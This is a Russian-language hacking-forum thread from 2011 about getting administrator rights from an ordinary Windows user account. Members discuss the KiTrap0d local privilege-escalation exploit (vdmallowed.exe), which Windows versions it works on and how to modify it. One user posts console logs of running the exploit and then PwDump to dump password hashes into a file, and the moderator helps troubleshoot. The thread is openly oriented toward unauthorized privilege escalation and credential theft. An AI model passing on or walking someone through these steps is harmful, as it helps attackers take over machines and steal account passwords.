Получаем учетку админа из учетки юзера

Discussion in 'Video.Antichat' started by DooD, 29 Jul 2011.

  1. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    _________________________
    10 people like this.
  2. aladin1

    aladin1 Member

    Joined:
    16 Sep 2009
    Messages:
    330
    Likes Received:
    29
    Reputations:
    7
    вот только автор забыл указать, что данный сплойт срабатывает не на всех windows, а лишь на мизерной их части ;)
     
  3. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    aladin1 пашет на всех nt это довольно много ,а именно:
    win nt,2000,xp,server 2003,vista,7,server 2008
     
    _________________________
  4. R_1za

    R_1za Member

    Joined:
    20 Jul 2011
    Messages:
    13
    Likes Received:
    7
    Reputations:
    3
    мдеееее Легких путей не ищем!! а ведь все на много проще,админку можно получить без всяких сплоитов выполнив всего лишь одну команду!
    Читайте,учите батнька))
     
  5. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    просвети не просвещенного.
     
    _________________________
  6. MTV

    MTV New Member

    Joined:
    16 Feb 2011
    Messages:
    180
    Likes Received:
    2
    Reputations:
    0
    Мне тоже интересно,каких таких батньков учить?
     
  7. ShkiperLol

    ShkiperLol Banned

    Joined:
    17 Apr 2010
    Messages:
    189
    Likes Received:
    1
    Reputations:
    0
    R_1za дно

    DooD кинь свой китрапод
     
  8. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    892
    Likes Received:
    300
    Reputations:
    530
    Такой сгодится?
    https://forum.antichat.ru/threadnav172545-1-10.html
     
  9. ShkiperLol

    ShkiperLol Banned

    Joined:
    17 Apr 2010
    Messages:
    189
    Likes Received:
    1
    Reputations:
    0
    та походу он один и тот же везде..
    хз я пробовал, работает где-то на ~3% Win
     
  10. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    все там работает,на всех виндах что я перечислил.
    1)дллка всегда должна быть в одной папке со сплоитом
    2)возможно(!)что не будет работать ЕСЛИ отключены ветки msdos16 или wowexec , но по умолчанию этого нет.Скорее всего проверялось на кривых сборках где реестр крученный-перекрученный.
    1)перепилить можно с добавлением исключения (при хард резете) на эту функцию:KernelGetProcByName
    2)допилить virtuallock
    3)Допилить проверку на включенность msdos16 и wowexec при выключенном-включать(если это позволено)
    4)можно сделать чисто экзэшник без либы
    5)сорцы на воле так что кто хочет(может)-дерзайте.
    у меня получилось заюзать на : win xp sp2 (чистая), winxp sp3 zver, win vista (чистая),win 7 (sp1)

    Есть еще один интересный сплоит повышающий привилегии ,причем актуальный на него ни заплаток ничего нету,но енто уже наверно потом обсудим.
     
    _________________________
    #10 DooD, 22 Aug 2011
    Last edited: 22 Aug 2011
  11. Osama2012

    Osama2012 New Member

    Joined:
    13 Dec 2011
    Messages:
    61
    Likes Received:
    2
    Reputations:
    1
    после ввода type pas.txt пишет:
    Failed to open SCM
     
  12. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    попробуй другую прогу для дампа.
    Админа получил?
    Применяешь локально или удаленно?
    Конкретнее.
     
    _________________________
  13. Osama2012

    Osama2012 New Member

    Joined:
    13 Dec 2011
    Messages:
    61
    Likes Received:
    2
    Reputations:
    1
    а какую посоветуеш?
    применяю как ты по примеру, на виртуалке
     
  14. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    да погугли,их десятки,просто выбрал эту.В чем проблема я не пойму,главное получить права и все.
     
    _________________________
  15. Osama2012

    Osama2012 New Member

    Joined:
    13 Dec 2011
    Messages:
    61
    Likes Received:
    2
    Reputations:
    1
    попробовал на своей тачке, офнул авирь, запустился и все работает.
    может быть на той винде которая на виртуалке, установлен фикс на даную уязвимость?
     
  16. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    от сплоита заплатки нету.Возможно это какая то "грязная сборка" по этому и не работает.проверь для начала сплоит.
     
    _________________________
  17. Osama2012

    Osama2012 New Member

    Joined:
    13 Dec 2011
    Messages:
    61
    Likes Received:
    2
    Reputations:
    1
    на виртуалке стоит " Windows XP Professional SP3 Russian (VL) - (оригинальный + все обновления на 19.07.09)", а у меня как раз то "чуток грязная" винда.

    P.S. пардон за глупый вопрос, но как проверить сплоит?
     
  18. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    сделай учетку с правами юзера,запусти сплоит,попробуй изменить системную дату.
     
    _________________________
  19. Osama2012

    Osama2012 New Member

    Joined:
    13 Dec 2011
    Messages:
    61
    Likes Received:
    2
    Reputations:
    1
    походу не пашет :(
    Code:
    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.
    
    C:\Documents and Settings\admin>date 07-07-07
    Клиент не обладает требуемыми правами.
    
    C:\Documents and Settings\admin>cd c:\
    
    C:\>cd exploit
    
    C:\exploit>vdmallowed.exe
    --------------------------------------------------
    Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
    -------------------------------------------- taviso@sdf.lonestar.org ---
    
    
    [+] Spawning a shell to give SYSTEM token (do not close it)
    [?] CreateProcess("C:\WINDOWS\SYSTEM32\CMD.EXE") => 1284
    [?] GetVersionEx() => 5.1
    [?] NtQuerySystemInformation() => \WINDOWS\system32\ntoskrnl.exe@804D7000
    [?] Searching for kernel 5.1 signature { 64, a1, ... } ...
    [+] Signature found 0x32437 bytes from kernel base
    [+] Starting the NTVDM subsystem by launching MS-DOS executable
    [?] CreateProcess("C:\WINDOWS\SYSTEM32\DEBUG.EXE") => 384
    [?] OpenProcess(384) => 0x7d0
    [?] Injecting the exploit thread into NTVDM subsystem @0x7d0
    [?] WriteProcessMemory(0x7d0, 0x2070000, "VDMEXPLOIT.DLL", 14);
    [?] WaitForSingleObject(0xc, INFINITE);
    [?] GetExitCodeThread(0xc, 0012FF44); => 0xc0000005
    [!] The exploit thread returned an unexpected error, 0xc0000005
    [+] Press any key to exit...
    выпрыгует еще одна консоль
    Code:
    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.
    
    C:\exploit>PwDump.exe localhost >> pass.txt
    
    pwdump6 Version 2.0.0-beta-2 by fizzgig and the mighty group at foofus.net
    ** THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. **
    Copyright 2009 foofus.net
    
    This program is free software under the GNU
    General Public License Version 2 (GNU GPL), you can redistribute it and/or
    modify it under the terms of the GNU GPL, as published by the Free Software
    Foundation.  NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
    PROGRAM.  Please see the COPYING file included with this program
    and the GNU GPL for further details.
    
    
    C:\exploit>type pass.txt
    Failed to open SCM
    
    C:\exploit>date 07-07-07-
    Клиент не обладает требуемыми правами.
    
    C:\exploit>
     
  20. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    походу что да.вот тебе и причина.проверь инструкцию,пост последний на 1-й странице.
     
    _________________________
Loading...